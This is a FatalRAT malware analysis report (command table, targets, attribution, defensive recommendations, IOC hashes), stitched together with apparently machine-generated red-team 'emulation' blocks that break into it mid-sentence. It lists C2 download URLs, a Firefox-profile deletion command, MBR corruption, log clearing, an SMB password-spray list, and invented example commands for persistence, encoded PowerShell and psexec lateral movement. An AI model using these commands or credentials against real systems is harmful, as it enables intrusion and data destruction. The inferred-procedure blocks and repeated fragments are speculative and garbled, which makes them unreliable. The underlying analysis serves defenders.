VirusScan f-secure.exe F-Secure security solutions ccSvcHst.exe, ccSetMgr.exe Symantec security solutions authfw.exe Authentium Firewall vsserv.exe Bitdefender Total Security cfp.exe COMODO security solutions F-PROT.exe F-Prot Antivirus guardxservice.exe Ikarus security solutions mssecess.exe Microsoft Security Essentials V3Svc.exe, patray.exe AhnLab security solutions remupd.exe Panda antivirus software almon.exe Sophos AutoUpdate Monitor APASServ.exe Sunbelt AutoPilot

Phase: Persistence

• Technique: Registry Run Key for Persistence

• Procedure: The malware sets a value in the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SVP7 to automatically launch itself on system startup.

• Technique: Service Creation for Persistence

• Procedure: If configured, the malware can create a service using name and description from embedded configuration data.

Phase: Execution

• Technique: DLL Execution
• Procedure: The malware downloads its binary from the command and control server and saves it to C:\Windows\nw_elf.dll.

Phase: Discovery

• Technique: System Information Discovery

• Procedure: Collects information such as:

  • Operating system installation time
  • Operating system architecture and version
  • User name
  • CPU information
  • Information about security solutions and other running software processes

• Technique: Process Discovery

• Procedure: Searches for processes related to various security solutions and cryptocurrency miners, including:

  • 360tray.exe
  • avp.exe
  • KvMonXP.exe
  • RavMonD.exe
  • 360sd.exe
  • Miner.exe
  • egui.exe
  • kxetray.exe, ksafe.exe
  • TMBMSRV.exe
  • avgui.exe
  • ashDisp.exe
  • MPMON.EXE
  • avcenter.exe, arcavir.exe, agent.exe
  • spidernt.exe
  • Mcshield.exe
  • f-secure.exe
  • ccSvcHst.exe, ccSetMgr.exe
  • authfw.exe
  • vsserv.exe
  • cfp.exe
  • F-PROT.exe
  • guardxservice.exe
  • mssecess.exe
  • V3Svc.exe, patray.exe
  • remupd.exe
  • almon.exe
  • APASServ.exe

• Technique: Application Window Discovery

• Procedure: Checks if Tencent QQ messenger is running by searching for window class CTXOPConntion_Class.

• Technique: User Activity Monitoring

• Procedure: Determines if the user is idle by checking for the absence of input events for over 180,000 ticks.

Process name Application FortiTray.exe Fortinet software NVCSched.exe Norman Virus Control Scheduler QQPCRTP.exe Tencent QQPCMgr BaiduSdSvc.exe Baidu Antivirus qq.EXE Tencent QQ yy.exe xfplay 9158.EXE 9158chat Camfrog Video Chat.exe Camfrog Video Chat mstsc.EXE Windows remote desktop client AliIM.exe TradeManager DUBrute.exe DUBrute bruteforce tool Nsvmon.npc Naver Anti-Virus knsdtray.exe Keniu Free Antivirus FTP.exe Windows FTP client ServUDaemon.exe Serv-U FTP Server safedog.exe Safedog security solution QUHLPSVC.EXE Quick Heal AntiVirus s.exe, 1433.exe Unknown When all the data has been collected, the malware transfers it to the command and control server. The method of encrypting and decrypting traffic to the management server has not changed from the previous version of FatalRAT. Fig. 18 FatalRAT C2 request encryption routine Next, the malware waits for commands to arrive from the command and control server; the commands supported by the detected version of FatalRAT are listed below: Command id Command description 0x6B Runs keylogger and sends collected data to C2 0x6C-0x71 Command codes reserved for plugins 0x7CExecutes one specified subcommand: • 0x7D – corrupt Master Boot Record (MBR) • 0x7E – open the CD\DVD drive • 0x7F – close the CD\DVD drive • 0x80 – show Program Manager window • 0x81 – hide Program Manager window • 0x82 – play monophonic sounds through the built-in speakers • 0x83 – move running windows and play monophonic sounds through the built-in speakers 15 times • 0x84 – turn off the screen

Phase: Execution

• Technique: Custom Command Execution via FatalRAT
• Description: FatalRAT listens for specific commands from the command and control server. Supported commands include:
• 0x6B: Run keylogger and send data to C2.
• 0x7D: Corrupt Master Boot Record (MBR).
• 0x7E: Open CD/DVD drive.
• 0x7F: Close CD/DVD drive.
• 0x80: Show Program Manager window.
• 0x81: Hide Program Manager window.
• 0x82: Play monophonic sounds through speakers.
• 0x83: Move running windows and play sounds 15 times.
• 0x84: Turn off the screen.

Phase: Persistence

• Technique: Scheduled Task or Service Execution (Inference Based)
• Assumed Procedure: Persistence may be achieved through scheduled tasks or services running continuously, such as NVCSched.exe or knsdtray.exe.

Phase: Collection

• Technique: Keylogging and Data Exfiltration
• Description: The malware runs a keylogger (0x6B command) and exfiltrates collected data to the C2 server.

Phase: Command and Control

• Technique: Encrypted Traffic to C2
• Description: Data collected is encrypted and sent to the command and control server using a known encryption routine from previous versions of FatalRAT.

Phase: Initial Access

• Technique: Use of Legitimate Applications (Inference Based)
• Executed Programs:
• FortiTray.exe (Fortinet software)
• QQPCRTP.exe (Tencent QQPCMgr)
• BaiduSdSvc.exe (Baidu Antivirus)
• Nsvmon.npc (Naver Anti-Virus)

These programs may be used or mimicked to gain initial access or maintain stealth.

Command id Command description • 0x85 – turn on the screen • 0x86 – hide TaskBar • 0x87 – show TaskBar • 0x88 – swap left and right mouse buttons • 0x89 – restore mouse buttons actions 0x8A Sends data collected by keylogger to command and control server 0x8CChanges screen resolution to 1600×900 0x8ERuns the application with the rights of another user 0x8FFinds and deletes user data in the Chrome browser (Chrome User Data) 0x90 Kills explorer.exe process 0x91Finds and deletes user data (cookies and history) in the Internet Explorer browser 0x92Deletes \AppData\Local\Google\Chrome\User Data\Default folder 0x93Deletes \AppData\Roaming\Microsoft\Skype for Desktop folder 0x94 Executes del /s /f %appdata%\Mozilla\Firefox\Profiles*.db command to delete Mozilla Firefox user profiles data 0x95 Deletes \AppData\Roaming\360se6\User Data\Default folder 0x96Deletes \AppData\Local\Tencent\QQBrowser\User Data\Default folder 0x97 Deletes \AppData\Roaming\SogouExplorer folder 0x98 Starts processes: %AppData%\run.exe -e -n d.rar, then starts svp7.exe, and 1200.exe; the command is saved to file C:\ProgramData\jy.lnk 0x99 Downloads UltraViewer from http://svp7[.]net:9874/UltraViewer.exe and installs it 0x9A Downloads AnyDesk from http://svp7[.]net:9874/AnyDesk.exe and runs it with connection password 123456 0x9CScans the network for devices running Windows that have shared folders accessible via SMB protocol, and attempts to connect to the following shared folders of the remote system using the login Administrator and the following passwords: administrator, test, admin, guest, alex, home, love, xp, user, game, 123, nn, root, iDgvi, movie, time, yeah, money, xpuser, hack, password, 111, 123456, qwerty, test, abc123, memory, home, 12345678, bbbbbb, 88888, caonima, 5201314, 1314520, asdfgh, alex, angel, null, asdf, baby, woaini. If the connection is successful, the malware tries to copy the executable file of the process and the context of which it is run in: · admin$ · C$ · D$ · E$ · F$ with the name hackshen.exe and runs it. 0Kills specified process 1Deletes FatalRAT service and registry key 2 Sets Remark key for malware service with value received from command and control server 3 Sets Group key for malware service with value received from command and control server 4Clears Windows event logs: Security, System and Application

Phase: Execution

• Technique: Screen Control
• Command: 0x85 – Turn on the screen
• Technique: TaskBar Control
• Command: 0x86 – Hide TaskBar
• Command: 0x87 – Show TaskBar
• Technique: Mouse Button Swap
• Command: 0x88 – Swap left and right mouse buttons
• Command: 0x89 – Restore mouse buttons actions

Phase: Exfiltration

• Technique: Keylogger Data Exfiltration
• Command: 0x8A – Send data collected by keylogger to command and control server

Phase: Impact

• Technique: System Resolution Change
• Command: 0x8C – Change screen resolution to 1600×900
• Technique: Process Termination
• Command: 0x90 – Kill explorer.exe process

Phase: Execution

• Technique: User Privilege Execution
• Command: 0x8E – Run the application with the rights of another user

Phase: Defense Evasion

• Technique: Browser Data Deletion
• Command: 0x8F – Find and delete user data in the Chrome browser
• Command: 0x91 – Find and delete user data in Internet Explorer
• Command: 0x92 – Delete \AppData\Local\Google\Chrome\User Data\Default folder
• Command: 0x93 – Delete \AppData\Roaming\Microsoft\Skype for Desktop folder
• Command: 0x94 – Execute del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db
• Command: 0x95 – Delete \AppData\Roaming\360se6\User Data\Default folder
• Command: 0x96 – Delete \AppData\Local\Tencent\QQBrowser\User Data\Default folder
• Command: 0x97 – Delete \AppData\Roaming\SogouExplorer folder

Phase: Execution

• Technique: Program Execution
• Command: 0x98 – Start processes: %AppData%\run.exe -e -n d.rar, then starts svp7.exe, and 1200.exe; save command to C:\ProgramData\jy.lnk

Phase: Lateral Movement

• Technique: Network Scanning and SMB Exploitation
• Command: 0x9C – Scan the network for devices with shared folders via SMB; use various credentials; if successful, copy and run hackshen.exe on:
  • admin$, C$, D$, E$, F$

Phase: Execution

• Technique: Remote Access Tool Installation
• Command: 0x99 – Download and install UltraViewer
• Command: 0x9A – Download and run AnyDesk with connection password 123456

Phase: Defense Evasion

• Technique: Service & Registry Manipulation
• Command: 1 – Delete FatalRAT service and registry key
• Command: 2 – Set Remark key for malware service
• Command: 3 – Set Group key for malware service

Phase: Defense Evasion

• Technique: Event Log Clearing
• Command: 4 – Clear Windows event logs: Security, System, and Application

Command id Command description 5Downloads and runs file 6 Updates malware: downloads file and runs it as a service with the name Fatal 7 Moves file 8Opens specified URL using Internet Explorer 9 Opens specified URL using Internet Explorer with hidden window 0xA Creates file, writes data and runs this file 0xBCreates file %AppData%\ svp7.exe, writes data to this file and runs %AppData%\UAC.exe 0xCCreates file %AppData%\UAC.exe and write data to this file 0xD Shows message to the user with MessageBox API function call 0xE Finds process by name 0xFFinds windows by class name 0x10 Starts proxy server 0x11 Stops proxy server 0x12Loads plugin Targets After a thorough analysis of the malware, TTPs, infrastructure and other data associated with the attack, our investigation confirmed that the targets included government agencies and industrial enterprises associated with the following industries: manufacturing, construction, information technology, telecommunications, healthcare, power and energy, and large-scale logistics and transportation. With few exceptions, all the attack targets are from the APAC region, primarily from Taiwan, Malaysia, China, Japan, Thailand, South Korea, Singapore, the Philippines, Vietnam, and Hong Kong. In some cases, the attack was specifically designed to target Chinese-speaking targets by masquerading as legitimate tax filing tools. The statistics below are based on the first-stage loaders being delivered to targets in various industries. Interestingly, some of the targets’ machines were identified as engineering workstations or automation engineers’ systems. Fig. 19 Infected system distribution charts About the attackers There is no clear consensus among researchers as to who is behind the attacks using FatalRAT. For example, ESET report states that they do not attribute this activity to any known group. At the same time, in one of the first papers on FatalRAT, published by

Phase: Execution

• Technique: Malicious File Execution
• Procedure: The malware downloads a file and executes it as a service under the name "Fatal."

Phase: Execution

• Technique: File Move
• Procedure: The malware moves files between directories as part of its operation.

Phase: Command and Control

• Technique: Web Service Interaction
• Command: iexplore.exe <URL>
• Description: Opens a specified URL using Internet Explorer.

Phase: Command and Control

• Technique: Web Service Interaction with Hidden Window
• Command: iexplore.exe <URL> /hidden
• Description: Opens a specified URL using Internet Explorer in a hidden window.

Phase: Execution

• Technique: File Creation and Execution
• Procedure: Creates a file, writes data to it, and executes the file.

Phase: Execution

• Technique: File Creation and Execution
• Procedure: Creates a file %AppData%\svp7.exe, writes data, and executes %AppData%\UAC.exe.

Phase: Execution

• Technique: File Creation
• Procedure: Creates a file %AppData%\UAC.exe and writes data to it.

Phase: Impact

• Technique: User Notification
• Procedure: Displays a message box to the user using the MessageBox API function.

Phase: Discovery

• Technique: Process Discovery
• Command: Finds processes by name.

Phase: Discovery

• Technique: System Information Discovery
• Command: Finds windows by class name.

Phase: Command and Control

• Technique: Proxy Server Activation
• Command: Starts a proxy server to route traffic.

Phase: Command and Control

• Technique: Proxy Server Deactivation
• Command: Stops the proxy server.

Phase: Execution

• Technique: Plugin Loading
• Procedure: Loads additional plugins to extend functionality.

TrendMicro, the researchers concluded that this series of attacks is related to the activity of the Purple Fox botnet. In the same article, the researchers provided evidence of a connection between FatalRAT and another backdoor, Gh0st RAT, which was previously leaked on GitHub. Knowing the connection between these two backdoors, it is worth pointing out the publication of the Chinese research center Weibu. The infection chain and payload (Gh0st RAT) used in the attack described by Weibu suggest that the report describes another, perhaps earlier, series of attacks with which we can see similarities, particularly in the TTPs: Malware loaders were distributed using WeChat and masked as financial documents. Publicly available services were used to host files needed to run the malware. The threat actor uses a black and white method, where the actor leverages the functionality of a legitimate binary to make the chain of events look like normal activity. Uses a large number of malware command and control server addresses with the ability to change them dynamically. Malware configuration data often contains non-standard ports for connecting to command and control servers. Weibu experts in their report also do not attribute the series of attacks they identified to the activity of any named group, so they assigned it a new name – Silver Fox. Interestingly, they also describe an approach to spreading the Gh0st RAT using fake websites that were moved up in search results thanks to SEO optimization. The same approach was reported by the ESET experts for spreading FatalRAT. All these publications have similarities in instrumentation and described TTPs, and perhaps they all reflect different series of attacks that are somehow related. During our research, we were also unable to determine which of the known groups this series of attacks belongs to, but we can assume with medium confidence that a Chinese-speaking threat actor is behind the attack. A number of indirect indicators point to this: Querying current services using registry keys and saving data in the Chinese date format. Susceptibility to DLL sideloading exposes legitimate software to exploitation, particularly DriverAssistant.exe, developed in the Chinese language. Exploitation of legitimate regional cloud hosting services, particularly myqcloud.com, to host malicious payloads and exploitation of legitimate cloud note services, such as Youdao, to host infrastructure details or payload hosting. Language artifacts: PDB paths mentioned above, use of Chinese version of MMC whose interface is supported by the malware loader (as the attackers placed MMC inside the second-stage loader, they could have used any version but chose a Chinese one), executable file metadata and Fangao.dll resource language: Fig. 20 First-stage loader metadata Fig. 21 Second-stage loader resources metadata The hypothesis of a connection between FatalRAT and Gh0st RAT may also be supported by the intersection of malicious infrastructure, for example: nbs2012.novadector[.]xyz mentioned in the Weibu report, according to Kaspersky telemetry data, previously hosted a file with the MD5 hash 26D1F8CC33A7567463BFAEBC2242833C, which points to the 0user.exe file we found in this attack.

Phase: Initial Access

• Technique: Social Engineering via Messaging Application
• Procedure: Malware loaders were distributed using WeChat and masked as financial documents.

Phase: Delivery

• Technique: Search Engine Optimization (SEO) Poisoning
• Procedure: Fake websites were optimized to appear higher in search results to spread Gh0st RAT.

Phase: Execution

• Technique: DLL Sideloading
• Procedure: Exploit legitimate software, particularly DriverAssistant.exe, to execute malicious payloads using DLL sideloading.

Phase: Persistence

• Technique: Legitimate Binary Abuse
• Procedure: Leverages functionality of legitimate binaries to mask malicious activity and ensure persistence.

Phase: Command and Control

• Technique: Dynamic C2 Configuration
• Procedure: Uses multiple C2 server addresses and non-standard ports for command and control communication.

Phase: Infrastructure

• Technique: Cloud Service Exploitation
• Procedure: Utilizes regional cloud hosting services like myqcloud.com and cloud note services like Youdao for payload hosting and infrastructure communication.

Additional Observations

• Language Artifacts: Usage of Chinese language artifacts in executable metadata and PDB paths, indicating possible origin and intent to blend in culturally.

34.kosdage[.]asia, which was used as a FatalRAT command and control server according to DNS history service information on 2023-04-05, had an IP of 43.155.73[.]235. This IP address has hosted malicious domains in the past. One of them was api.youkesdt[.]asia, which was reported by Cofense for distributing the open source Gh0st RAT. The Cofense researchers also do not draw any conclusions about who was behind this series of attacks, but they do point out the similarity of the discovered techniques to those of the well-known Chinese-speaking APT27 group. Conclusions We repeatedly see threat actors using shared libraries, tools, and payloads, finding it convenient to reuse existing code and adapt it to their needs. As malware authors become more sophisticated, relying solely on static indicators of compromise (IOCs) may be insufficient, as these IOCs are designed to change over time. To address this, we have gathered all the samples we collected in an effort to identify any commonalities that can help us track them effectively. Our investigation has led us to successfully track these loaders based on shared code blocks, rich headers, debug information and TTPs observed throughout the execution flow. This report serves as a warning to various industrial organizations in the APAC region, alerting them to the threat actors who demonstrate an ability to gain access to OT-related systems. Being aware of such potential threats enables these organizations to bolster their security measures and proactively respond to protect their assets and data from malicious actors. During our research, we found that the attackers use a variety of methods to evade detection and blocking: dynamically changing control servers, placing files on legitimate web resources, exploiting vulnerabilities in legitimate applications to launch malware, packaging and encrypting files and network traffic, and much more. FatalRAT’s functionality gives an attacker almost unlimited possibilities for developing an attack: spreading over a network, installing remote administration tools, manipulating devices, stealing and deleting confidential information, etc. Obviously, infection with this type of malware poses great risks, especially for industrial organizations like the ones we saw among the targets. After a comprehensive analysis of the attacker’s tactics, techniques and procedures (TTPs) in the payloads and infrastructure, we are unable to link this activity to any known group. However, the consistent use of services and interfaces in Chinese at various stages of the attack, as well as other indirect evidence, indicates that a Chinese-speaking actor may be involved. Recommendations We recommend taking the following measures to avoid falling victim to the attack described above: Enable two-factor authentication for logging in to administration consoles and web interfaces of security solutions. In the Kaspersky Security Center, for example, this can be done by following instructions. Install up-to-date versions of centrally managed security solutions on all systems and update antivirus databases and program modules on a regular basis. Check that all security solutions components are enabled on all systems and that active policies prohibit disabling protection and terminating or removing solutions components without entering the administrator password. Check that security solutions receive up-to-date threat information from the Kaspersky Security Network on those groups of systems on which using cloud security services is not forbidden by laws or regulations. Check that license keys of security solutions have been distributed to all devices and that periodical system scanning tasks have been created for all device groups. Update operating systems and applications, to versions currently supported by the vendors. Install the latest security updates (patches) for operating systems and applications. Deploy a SIEM system, for example, Kaspersky Unified Monitoring and Analysis Platform. Implement the following correlation rules into the SIEM system: New services created on Windows-based systems. The appearance of new applications in startup, in particular, monitoring the values of the Run registry keys. The appearance of new Logon Scripts on Windows-based systems. Logins of domain accounts to systems they have not logged into before. Windows Event Logs clearing.

Phase: Initial Access

• Technique: Exploiting Vulnerabilities in Applications
• Procedure: The attacker exploits vulnerabilities in legitimate applications to launch malware.

Phase: Execution

• Technique: RAT Deployment
• Tool: FatalRAT
• Functionality: Provides capabilities for spreading over a network, installing remote administration tools, manipulating devices, and stealing or deleting confidential information.

Phase: Persistence

• Technique: Registry Run Keys / Startup
• Procedure: Monitor for new applications appearing in startup by checking Run registry keys for persistence mechanisms.

Phase: Defense Evasion

• Technique: Dynamic C2 Changes
• Procedure: Dynamically change control servers to evade detection and blocking.
• Technique: File and Traffic Encryption
• Procedure: Package and encrypt files and network traffic to avoid detection.

Phase: Impact

• Technique: Data Manipulation and Exfiltration
• Procedure: Manipulate devices and steal or delete confidential information.

Additional Considerations

• Monitor for new services created on Windows-based systems.
• Observe for the appearance of new Logon Scripts on Windows-based systems.
• Track logins of domain accounts to unfamiliar systems.
• Pay attention to Windows Event Logs clearing as a potential sign of malicious activity.

Security solutions shut down. Password brute force (multiple unsuccessful login attempts). Port scanning of systems inside enterprise network, as well as attempts to detect network shared folders. Attempts to communicate over non-standard ports for known protocols, such as TCP port 82 for the HTTP requests. Check that Active Directory policies include restrictions on user attempts to log in to the system. Users should be allowed to log in only to those systems accessing which is required for them to perform their job responsibilities. Utilize EDR/XDR/MDR solutions for establishing a baseline regarding the most commonly observed grandparent-parent-child process relationship in OT environments. This highly recommended advice stems from our observation that a legitimate function of the binary “pureplayer” was exploited to execute the subsequent staged payload. Train employees of the enterprise to work securely with the internet, email, messengers and other communication channels. Specifically, explain the possible consequences of downloading and launching files from unverified sources. Make an emphasis on phishing email control, as well as secure practices related to working with archives. Configure filtration of content sent via email and set up multitier filtration of incoming email traffic. Consider using sandbox solutions designed to automatically test attachments in inbound email traffic; make sure your sandbox solution is configured not to skip emails from “trusted” sources, including partner and contact organizations. Implement application whitelisting solutions to allow only approved and digitally signed applications to run on your network. It would mitigate the risk of DLL sideloading techniques commonly exploited by threat actors. Establish the following password complexity requirements in Active Directory group policies: Password length: at least 10 characters for unprivileged accounts and 16 characters for privileged accounts. A password should contain uppercase letters, lowercase letters, digits, and special characters: (! @ # $ % ^ & * ( ) – _ + = ~ [ ] { } | \ : ; ‘ ” < > , . ? /) A password should not contain dictionary words or the user’s personal data that could be used to crack the password, such as: the user’s name(s), telephone numbers, memorable dates (birthdays, etc.); characters located sequentially on the keyboard (“12345678”, “QWERTY”, etc.); common abbreviations and terms (“USER”, “TEST”, “ADMIN”, etc.). Prohibit storing and sending passwords in plain text; use dedicated password management software to store and transfer passwords. Implement two-factor authentication for authorization (using RDP or other protocols) on systems that contain confidential data and systems that are critical to the organization’s IT infrastructure, such as domain controllers. Use Active Directory group policies to restrict the execution of binaries signed with revoked digital signatures. Group Policy settings can help enforce specific security configurations across multiple machines. Enhance network segmentation. Configure the networks of different divisions (as well as different enterprises) as separate segments. Limit data transfers between network segments to a minimal list of ports and protocols necessary for the organization’s operations. Make it the responsibility of administrators to avoid using privileged accounts, except in cases where their duties can only be performed using these accounts. We also recommend restarting the system after using a privileged account on it – this will clear RAM and make it impossible to extract the privileged account’s authentication credentials using hacking utilities. It is also recommended to use different dedicated accounts to administer different groups of systems, such as databases. Segregate services related to maintaining the organization’s information security into a dedicated segment and, if possible, a separate domain. Limit data transfers between that segment and the rest of the network to a minimal list of ports and protocols necessary to operate security solutions and perform monitoring to identify information security incidents. If remote access to systems in other network segments is required, set up demilitarized zones (DMZ) for communication between network segments and perform remote access via terminal servers. Use dedicated protection for industrial processes. Kaspersky Industrial CyberSecurity protects industrial endpoints and enables network monitoring on the OT network to identify and block malicious activity. Configure the backup storage system to store backups on a separate server that is not part of the domain, and ensure that backup deletion and modification rights are held only by a dedicated account that is also not part of the domain. This measure can help protect backups in the event that the domain is compromised.

Phase: Initial Access

• Technique: Password Brute Force
• Procedure: Multiple unsuccessful login attempts to gain access via password guessing.

Phase: Discovery

• Technique: Network and Host Discovery
• Procedure:
  • Port scanning within the enterprise network.
  • Attempts to detect network shared folders.

Phase: Command and Control

• Technique: Non-Standard Port Usage
• Procedure: Communication attempts over non-standard ports, such as using TCP port 82 for HTTP requests.

Phase: Execution

• Technique: Exploitation of Legitimate Functions
• Procedure: Exploitation of the legitimate function of “pureplayer” binary to execute subsequent staged payloads.

Defensive Measures

• Implement EDR/XDR/MDR solutions to establish baselines for process relationships.
• Application whitelisting to prevent unauthorized applications from executing.
• Ensure that administrative tasks using privileged accounts are minimized and followed by a system restart to clear RAM.
• Enhanced network segmentation and limiting inter-segment data transfers.
• Implement Active Directory policies to restrict execution of binaries with revoked digital signatures.
• Use two-factor authentication for systems with confidential data or critical infrastructure access.
• Configure backup systems to operate independently of the domain to protect against compromises.

Increase the frequency of backups to ensure that the failure of a server does not result in the loss of a critical volume of information. Store at least three backups for each server and other systems critical to the normal operation of the organization. In addition, at least one backup should be stored on a separate, autonomous data storage device. Use RAID arrays on servers where backups are stored. This will help improve the backup system’s fault tolerance. Implement a procedure to periodically check the integrity and usability of backups. In addition, implement a procedure to periodically scan backups with an antimalware solution. Irrespective of whether there are signs of an information security incident or not, we recommend that you adjust the Kaspersky Security Center settings in accordance with the best practices described in the Hardening Guide. Indicators of compromise Malicious attachments file names (original) 1_1_2023年国务院税务总局最新政策计划.exe 年度企业所得税汇缴补税尽量安排在5月份入库.zip 关于企业单位调整增值税税率有关政策关于企业单位调整增值税税率有关政策.exe 通知.exe （税-务-新-系-统).EXE （税-务-新-系-统）.zip 2023年国务院税务总局最新政策计划.rar （新-对-账-单）.zip (2023新-税-务- 系-统）.zip 税务总局关于补贴有关税收的公告.zip （税-务-新-系-统).zip 单据 (2).zip 2023税-务-新-系-统.zip 关于企业单位调整增值税税 率有关政策.rar 电 子 发 票.zip 税务局通知.zip 1_1_2023年国务院税务总局最新政策计划.exe （税-务-新-系-统）.zip 关于企业单位调整 增值税税率有关政策.zip 第三批税费优惠政策推出 .exe 年度企业所得税汇缴补税尽量安排在5月份入库.zip 关于企业单位调整增值税税率 有关政策关于企业单位调整增值税税率有关政策.exe 税前加计扣除新政指引(1).zip 税务稽查抽查事项清单.rar 税务局通知.zipqm 关于企 业新政策.rar 第三批税费优惠政策推出.rar 关于企业单位调整增值税税率有关政策.exe 新政策-税务.rar 政策三步骤.rar 通知.exe （税-务-新-系-统).EXE （税-务-新-系-统）.zip 2023年国务院税务总局最新政策计划.rar （新-对-账-单）.zip (2023新-税-务-系-统）.zip 税务总局关于补贴有关税收的公告.zip （税-务-新-系-统).zip 单据 (2).zip 2023税-务-新-系-统.zip 关于企业单位调整增值税税率有关政策.rar 电 子 发 票.zip 税务局通知.zip 1_1_2023年国务院税务总局最新政策计划.exe （税-务-新-系-统）.zip 关于企业单位调整增值税税率有关政策.zip 第三批税费优惠政策推出 .exe 年度企业所得税汇缴补税尽量安排在5月份入库.zip 关于企业单位调整增值税税率有关政策关于企业单位调整增值税税率有关政策.exe 税前加计扣除新政指引(1).zip 税务稽查抽查事项清单.rar 税务局通知.zipqm 关于企业新政策.rar 第三批税费优惠政策推出.rar 关于企业单位调整增值税税率有关政策.exe 新政策-税务.rar 政策三步骤.rar Files hash (MD5) 02fb1958a901d7d1c8b60ecc0e59207c – first stage loader

Phase: Initial Access

• Technique: Phishing via Malicious Attachments
• Procedure: The attacker sends spear-phishing emails with malicious attachments disguised as tax and policy documents. The attachments are executables and archives designed to trick users into executing them.

Phase: Execution

• Technique: Malicious Attachment Execution
• Likely Procedure: The user is tricked into opening malicious files such as 1_1_2023年国务院税务总局最新政策计划.exe, leading to the execution of the payload.
• Likely Commands: After the user opens the executable, it typically runs with default execution parameters, potentially using hidden scripts or shell commands to deploy further payloads.

Phase: Persistence

• Technique: Scheduled Task or Startup Folder
• Inferred Command: The malware may create scheduled tasks or place itself in the startup folder to maintain persistence across reboots.
• Example: schtasks /create /tn "UpdateTask" /tr "C:\Temp\malicious.exe" /sc onlogon

Phase: Defense Evasion

• Technique: Encoded PowerShell Commands
• Inferred Command: The actor may use obfuscated PowerShell commands to evade detection.
• Example: powershell -enc <Base64EncodedCommand>

Phase: Credential Access

• Technique: Hooking or DLL Injection for Credential Harvesting
• Inferred Procedure: Utilizing tools that can hook into processes or inject DLLs to steal credentials from memory.

Phase: Lateral Movement

• Technique: Remote Service Execution
• Inferred Commands: Using psexec or wmic to move laterally across the network.
• Example: psexec \\targetPC -u user -p password cmd.exe /C "malicious_script.bat"

Phase: Impact

• Technique: Data Encryption for Impact
• Inferred Procedure: Deployed ransomware encrypts user data files to disrupt operations.
• Likely Command: The ransomware executes system-wide searches for files to encrypt, typically using built-in or custom encryption utilities.

This structured emulation is based on common attack methodologies inferred from the context provided.

033a8d6ec5a738a1a90dd4a86c7259c8 – first stage loader 04aa425d86f4ef8dc4fc1509b195838a – first stage loader 096c34df242562d278fc1578dc31df92 – first stage loader 09a50edb49cbb59a34828a37e63be846 – first stage loader 0a49345c77da210ab0cd031fda6bc962 – first stage loader 0a70ea6596c92fbfb461909ed57503fa – first stage loader 0b20f0ff1aaff4068f99f4db69ba9c1e – first stage loader 0c33792c6ed37452f44ca94ce7385250 – first stage loader 142eb5106fcc2f95b7daf37dca970595 – first stage loader 15b7990bd006d857ee02c529b45783ac – first stage loader 1c79abe9f52cbe92f042615a9f6b6f10 – first stage loader 1e80a8b3f4efb4bb27771d729f5ced85 – first stage loader 2026ead0c2366d049ecd5e42ac1b1b07 – first stage loader 24ecb197ee73e5b1eef2ded592640cf2 – first stage loader 26f0806932dfd029f0fe12e49bb4c799 – first stage loader 28231ce260ce66388d58ce536d7ed201 – first stage loader 2aa41ae3d3ae789147218652e6593161 – first stage loader 2bccd50322afb7a349c163ce9b76bb66 – first stage loader 357534f6a2bffa77b83501715e382a94 – first stage loader 362fc5799ecef8e9e328cfbf6272c48f – first stage loader 3843ef98a4c7ee88f10078e6a38f15ee – first stage loader 3883957530482a399abb5e1f06e4581f – first stage loader 3b32fc9115c224653f5afba793c0bbef – first stage loader 3ca82fd8d12967c32388ad18e9727fac – first stage loader 44b47fdab8ca3375fe5a875deefa265c – first stage loader 4fc6dbb9beeecb2d60f3fef356c6df01 – first stage loader 502054d938a18172a3657aaf2326bcf4 – first stage loader 50a5c5a3c07f04d96f5f1968996cfb74 – first stage loader 50d29ee29b54685bd10b8d2917696413 – first stage loader 58a8daae643a84c112ddc6e79c750271 – first stage loader 58e44c4d797cecfed42c1fdf18c2d5f9 – first stage loader 58fe500e022ea1aeebbe72c4ce694531 – first stage loader 5b730131c3271820c03d711f2549b894 – first stage loader 5c1de870ea1e08b25e7ce4397372f5a6 – first stage loader 5d7fba23a44683c0b471d9a7cc7f5042 – first stage loader 632c0808e4d0c7b293642e4c4ae8e2a2 – first stage loader 63562347202715eff0e7f2d6ad07a2aa – first stage loader 63c600434def54157204765619838372 – first stage loader 64013e613a0130cb1b7845139537bc5e – first stage loader

The provided data primarily consists of hashes labeled as "first stage loader." Without additional context or descriptions of the threat actor's activities, tools, or techniques from a CTI (Cyber Threat Intelligence) report, it's challenging to extract specific procedures directly related to TTPs used in attacks.

However, based on the mention of "first stage loader," we can infer some general procedures a red team might emulate during the initial stages of an attack. In a typical cyber attack involving loaders, here are possible structured scenarios:

Phase: Initial Access

• Technique: Spear Phishing Attachment
• Procedure: A malicious email with an attached file designed to be opened by the target to run the "first stage loader."

Phase: Execution

• Technique: Malicious Document Execution
• Command Example: Loading a malicious macro or script embedded in documents like Word or Excel that triggers the execution.

Phase: Payload Delivery

• Technique: First Stage Loader Execution
• Procedure: The loader initiates contact with a remote server to download additional payloads. This often involves using scripts or programs that execute upon opening the document.

Phase: Command and Control (C2)

• Technique: HTTP/HTTPS C2 Channel
• Inference: The loader may establish a connection to a C2 server, preparing for further instructions or payload downloads.

General Advice for Emulation:

• While specific command lines aren't provided, a red team could simulate these actions by using tools like PowerShell or custom scripts to pull staged payloads from a server once the loader is executed.

Next Steps for a Red Team:

1. Investigate and simulate how the loader might interact with external servers (for example, exfiltrating data or retrieving payloads).
2. Simulate the environment to trigger the loader, capturing any network calls or file actions to understand its behavior fully.

For more precise emulation, detailed threat intelligence describing the attack chain, specific tools, and observed behaviors would be necessary.

